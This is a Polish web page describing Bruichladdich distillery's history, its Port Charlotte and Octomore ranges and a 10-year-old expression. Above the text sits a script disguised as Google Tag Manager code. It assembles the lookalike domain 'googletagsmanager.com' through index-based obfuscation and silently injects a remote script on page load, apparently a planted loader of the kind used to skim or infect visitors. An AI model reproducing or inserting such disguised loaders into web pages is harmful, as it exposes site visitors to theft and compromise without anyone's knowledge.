/* ---------------- GoogleTagsManager start code ------------------ */ var bytes = [0, 0, 2, 3, 4, 5, 6, 7, 13, 14, 15, 18, 11, 14, 17, 14, 2, 7, 8, 9, 10, 11]; var i, s, o, g, r, a, m = [], hh = ['/', '.', '', 'om', '', 'c',], gtagHost = '//google.com/tag/ns', gtag = ''; for (var k = 0; k < bytes.length; k++) { gtag = gtag + gtagHost[bytes[k]]; } (function () { var li = document.createElement('script'); li.type = 'text/javascript'; li.src = gtag + "/gtag/?id=UA-23200573-1"; li.async = true; var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(li, s); })(); /* ------------ GoogleTagsManager end code ------------------*/

Bruichladdich Distillery

BRUICHLADDICH

Została założona w 1881 roku przez Roberta Williama i Johna Harveya - na brzegu zatoki Indaal, na przeciwko Bowmore, najstarszej destylarni na Islay. Obaj pochodzili z rodzin od stu lat zajmujących się pędzeniem whisky. Rodzina Harveyów była związana z gorzelnią aż do 1929 roku, kiedy zakład trzeba było zamknąć na dekadę. Destylarnia przechodziła w różna ręce, by w połowie lat 70. XX wieku zostać własnością Invergordon Distillers. Dwadzieścia lat później ogień pod alembikami ponownie zgasł, a Bruichladdich wystawiono na sprzedaż. Ostatecznie gorzelnię ocaliło konsorcjum zebrane w 2000 roku przez Marka Reyniera prowadzącego niezależną firmę butelkującą whisky. Wspierał go były zarządca Bowmore, Jim McEwan, który otrzymał za zadanie przywrócić świetność Bruichladdich. W czasie, gdy nowy spirytus zaczął trafiać do beczek, na rynku pojawiła się whisky z serii regularnych i limitowanych pochodząca z odziedziczonych zapasów. Tradycyjny styl gorzelni zakładał lekkie torfowanie sodu – inaczej niż większość destylarni na Islay – i był nieco podobny do Bunnahabhain. W 2002 roku nowi właściciele zdecydowali się poszerzyć asortyment o mocno torfową whisky nazwaną tak jak pobliska wioska Port Charlotte. Potem doszła jeszcze Octomore zawdzięczająca nazwę starej gorzelni z Islay, zamkniętej w 1852 roku. Octomore jest jedną z najbardziej uderzających, dymnych whisky, jakie kiedykolwiek zrobiono. Bruichladdich 10-letnia 46% Whisky o świeżym, kwiatowym zapachu, z aromatami słodu i zboża oraz nutą solanki o lekko oleistej fakturze.

www.bruichladdich.com

 

 

Pokaż:
Sortuj według: